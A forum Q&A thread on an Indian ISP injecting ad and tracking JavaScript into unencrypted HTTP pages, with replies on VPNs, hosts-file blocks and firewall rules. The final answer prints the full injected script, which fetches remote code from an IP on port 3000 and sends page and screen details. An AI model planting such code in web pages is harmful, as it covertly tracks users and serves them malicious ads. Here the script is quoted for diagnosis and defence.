up vote 4 down vote favorite
2

I've been recently having a problem where my ISP (BSNL India) has been injecting ads/weird Javascript Tracking codes onto my browser, making the website unusable and unresponsive.

I've written an article regarding this too: https://www.nonstoptrend.com/bsnl-is-injecting-adsscripts-onto-your-browser-using-phozeca-2017/

You can read that to understand what exactly is happening. You can refer to the article above to see what the injected code is doing.

I'm sure this is my ISP because the domain starts with "bsnl.phozeca.com" and uses the port "3000".

Points to note:- -Script injection works only on Non HTTPS sites, such as Steam Store and other Non HTTPS websites.

-The code being injected, uses the port 3000.

-Websites which malfunction normally work when CSP (Content Security Policy) is disabled in the browser.

-Websites which malfunction work properly on Tor Browser.

-I personally have investigated into this matter, and after reading through the code (Read my article to know what i'm talking about), and after reading the code, i called the "loadnewads()" function from the code, and once it's called, weird ads come up, such as fake Flash player ads and fake download buttons.

-Things i have tried to solve this problem.- 1) Checking hosts file and blocking the domain: Not working. The script is still being injected.

2) Scanning the PC for malware: Not working. I've scanned with over three antiviruses including Malwarebytes, still it doesn't detect anything.

3) Disabling CSP (Content Security Policy): Worked! However ads automatically start playing.

4) Changed DNS to Google's DNS: Not working.

Is there any way to solve this problem? Please help. Thanks!

share|improve this question
  • 1
    Use a VPN, or set up an AWS instance in another country and tunnel all your traffic through it. #1, 2 and 4 wouldn't do anything because they're modifying your traffic in-flight (hence why HTTPS is unaffected.) If you hide your traffic in encrypted tunnels, they can't mess with it without breaking your connection. – Ivan Apr 21 '17 at 18:53
  • Using a VPN will effect my social media profiles. They'll end up getting locked because of usage from an unknown IP address. Also, i cannot register on a new forum/website with a VPN because the IP must have been used previously for registering. – HDG390x Apr 21 '17 at 18:56
  • What about using NoScript or some other script blocking plugin that prevents third-party scripts from executing? – Ivan Apr 21 '17 at 18:58
  • Thanks for the suggestion, i will try it and let you know if it worked. Although the thing is that the code injected by my ISP doesn't get executed because the CSP is enabled, it still just comes there out of nowhere. – HDG390x Apr 21 '17 at 19:00
  • 1
    They'll always be able to inject code into your unencrypted traffic. If you won't encrypt it, and you can't change ISPs, the best you can do is try to stop it from executing-- so a NoScript + Adblock plugin combo is the best you can hope for. Port 3000 is probably just the remote socket that returns ads when the injected script calls home. – Ivan Apr 21 '17 at 19:08
up vote 2 down vote

First try to get along with your ISP to stop doing it(if it's applicable)

As you mentioned, HTTPS cannot be compromised which should be, so try to use HTTPS where possible.

About your next attempts

1) Checking hosts file and blocking the domain: Not working. The script is still being injected.

Must work, if it doesn't so you are doing it wrong. Another way is blocking the same thing with your modem or router domain/ip block(or firewall)

If your ISP is smart enough, it should host the scripts with vary domain names, so blocking all of them will be hard for you.

2) Scanning the PC for malware

Won't work of course

3) Disabling CSP (Content Security Policy)

Have no clue what is this, but since HTTP comes with zero security, this CSP could be fooled, or/and cannot say if a content is not permitted(what logic?)

4) Changed DNS to Google's DNS

Won't work of course, the issue you have is about the post dns. even if your ISP override the result by domain resolve, it's still simple to place the add in http.

100% working solutions
Use a VPN, or a sTunnel which binds to services like squid in back. This could not work if your ISP finds your connection to the target ip(either VPN or sTunnel) as its anti-ad policy.

50% working solutions
Block all of the contents by your browser adblock(or anything else) plugin.

share|improve this answer
up vote 2 down vote

I had similar issues. I have a simple trick but it is temporary, but it is working for me and stopped BSNL ISP from tracking and pushing malware AD popup. I added a host entry in my computer for bsnl.phozeca.com and pointed it to localhost.

share|improve this answer
  • The succinct point of your answer Preetham is a "blacklist" hosts file. Good answer and a very good solution to this sort of problem. It may or may not be temporary, it depends on the attacker and their persistence. Further reading here: someonewhocares.org/hosts and isc.sans.edu/forums/diary/Host+file+black+lists/6469 – 0xSheepdog May 10 '17 at 0:30
  • How did you manage to do it through your hosts file? I've tried doing the same, but it doesn't help. Can you please show me your hosts file so I can see how exactly you've done it? Thanks! – HDG390x May 11 '17 at 15:05
  • I use macbook, so the hosts file will be /etc/hosts. It didn't work for me too until I cleared DNS cache. I used below command dscacheutil -flushcache I think for windows it would be ipconfig /flushdns – Preetham Hegde May 13 '17 at 14:38
  • Hey, thanks for the reply. Although I added the entry to the hosts file and flushed the DNS, it didn't work. Somehow miraclly today when I tried to access the Steam Store, the Ads stopped coming! The script stopped damaging the websites. – HDG390x May 14 '17 at 7:12
  • I am also facing the same issue after switching to connect ISP provider and I just fixed this by your suggestion to block it via host entry : #Block adware from connect ##### 127.0.0.1 c.phozeca.com – shivgre Jul 22 '17 at 21:14
up vote 2 down vote

As Preetam suggested - adding more details.

  1. i downloaded the hosts file from http://winhelp2002.mvps.org/hosts.zip Replaced it in this location C:\Windows\System32\drivers\etc

  2. If you do not know how to replace the hosts file then you can follow this instruction http://winhelp2002.mvps.org/hostswin8.htm

  3. To get rid of the popup from engine.spotscenered.info/link.engine?guid= I added the following entries within the host file:

    0.0.0.0 www.onclickmax.com
    0.0.0.0 bsnl.phozeca.com
    0.0.0.0 *.onclickmax.com
    0.0.0.0 phozeca.com
    0.0.0.0 c.phozeca.com

I do not see any popup ads... gone!

share|improve this answer
up vote 1 down vote

It looks like the malware has evolved.

It now uses an IP and is injecting itself into js files of 'http' websites (used a proxy for analyzing).

For example in case of bbc.co.uk, when browser requested for the below url :

http://static.bbc.co.uk/id/0.37.24/modules/idcta/statusbar.js

instead of the below script (original) :

define(["idcta/idCookie","idcta/id-config","idcta/apiUtils"],function(d,c,h){var b={};function e(j){try{this.id=null;this.element=null;this.ctaLink=null;this.ctaName=null;if(f(j)){this.id=j.id;this.element=document.getElementById(j.id);if(!j.blq){this.ctaLink=document.getElementById("idcta-link");this.ctaName=this.element.getElementsByTagName("span")[0]}else{this.ctaLink=document.getElementById(j["link-id"])?document.getElementById(j["link-id"]):this.element.getElementsByTagName("a")[0];this.ctaName=j["name-id"]?document.getElementById(j["name-id"]):this.element.getElementsByTagName("span")[1]}var i=this;if(j.publiclyCacheable===true){if(d.getInstance().hasCookie()){if(c.status_url&&i.ctaLink.href!==c.status_url){i.ctaLink.href=c.status_url}a(i,d.getInstance())}else{if(c.signin_url){i.ctaLink.href=c.signin_url}i.ctaName.innerHTML=c.translation_signedout}}}}catch(k){h.logCaughtError(k)}}function a(m,k){try{var j=k.getNameFromCookie()||c.translation_signedin;var i=c.translation_signedin;if(j){i=g(j,14)}m.element.className=m.element.className+" idcta-signedin";m.ctaName.innerHTML=i}catch(l){h.logCaughtError(l)}}function g(j,i){if(j.length>i){return j.substring(0,i-1)+"…"}return j}function f(i){if(!document.getElementById(i.id)){return false}if(!i.blq&&!document.getElementById("idcta-link")){return false}if(i.blq&&!document.getElementById(i["link-id"])){return false}return true}b.Statusbar=e;b.updateForAuthorisedState=a;return b});

the malware (isp-end?) injected the below js malacious script :

!function(){var a="/id/0.37.24/modules/idcta/statusbar.js",r=null,e=document.getElementsByTagName("script"),i=e.length,n=null,t=Date.now(),s=null,o=0;for("/"===a.substring(0,1)&&(a=a.substring(1)),o=0;o<i;o+=1)
if(void 0!==e[o].src&&null!==e[o].src&&e[o].src.indexOf(a)>-1){n=o,r=e[o];break}
void 0!==r&&null!==r||(r=document.getElementsByTagName("script")[0]),s=r.src.indexOf("?")>-1?r.src+"&cb="+t.toString()+"&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag":r.src+"?cb="+t.toString()+"&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag";try{if(void 0===window.sarazasarazaNoti||null===window.sarazasarazaNoti||window.sarazasarazaNoti===Array&&window.sarazasarazaNoti.indexOf(r.src)<0){void 0!==window.sarazasarazaNoti&&null!==window.sarazasarazaNoti||(window.sarazasarazaNoti=new Array),window.sarazasarazaNoti.push(r.src);var c=r.parentNode,d=r;if(r.async||r.defer||null!==n&&n!==e.length-1){var w=document.createElement("script");w.src=s,c.replaceChild(w,d)}else document.write("<script type='text/javascript' src="+s+"><\/script>"),c.removeChild(d)}
var a1="117.254.84.212";var a2="3000";if(window===window.top&&(void 0===window.sarazasaraza||null===window.sarazasaraza||!window.sarazasaraza)){window.sarazasaraza=!0;var l=a1+":"+a2+"/getjs?nadipdata="+JSON.stringify("%7B%22url%22:%22%2Fid%2F0.37.24%2Fmodules%2Fidcta%2Fstatusbar.js%22%2C%22referer%22:%22http:%2F%2Fwww.bbc.com%2F%22%2C%22host%22:%22static.bbc.co.uk%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D")+"&screenheight="+screen.height+"&screenwidth="+screen.width+"&tm="+(new Date).getTime()+"&lib=true&fingerprint=c2VwLW5vLXJlZGlyZWN0";!function(a,r,e,i,n,t,s){t=r.createElement(e),s=r.getElementsByTagName(e)[0],t.async=!0,t.src=i,s.parentNode.insertBefore(t,s)}(window,document,"script","//"+l)}
var imgtag=document.createElement('img');imgtag.height='1';imgtag.width='1';imgtag.style='border-style:none;';imgtag.alt='';imgtag.src='//'+a1+":"+a2+"/pixel/1x1.png"}catch(a){}}()

The fix that worked was to add a rule in the firewall so as to block port 3000 across bsnl's range : 117.192.0.0 117.255.255.255 (based on ultra-dns's information).

Did this both at system level as well as at the asdl-router level (since mobile devices using the network are impacted as well).

Hopefully this will minimize conflicts with other applications that use port 3000.

For windows-os, video on blocking port can be found here : https://www.youtube.com/watch?v=KA8BIshUcXw

Regards

Ravindra

share|improve this answer

Your Answer

By clicking "Post Your Answer", you acknowledge that you have read our updated terms of service, privacy policy and cookie policy, and that your continued use of the website is subject to these policies.

Not the answer you're looking for? Browse other questions tagged or ask your own question.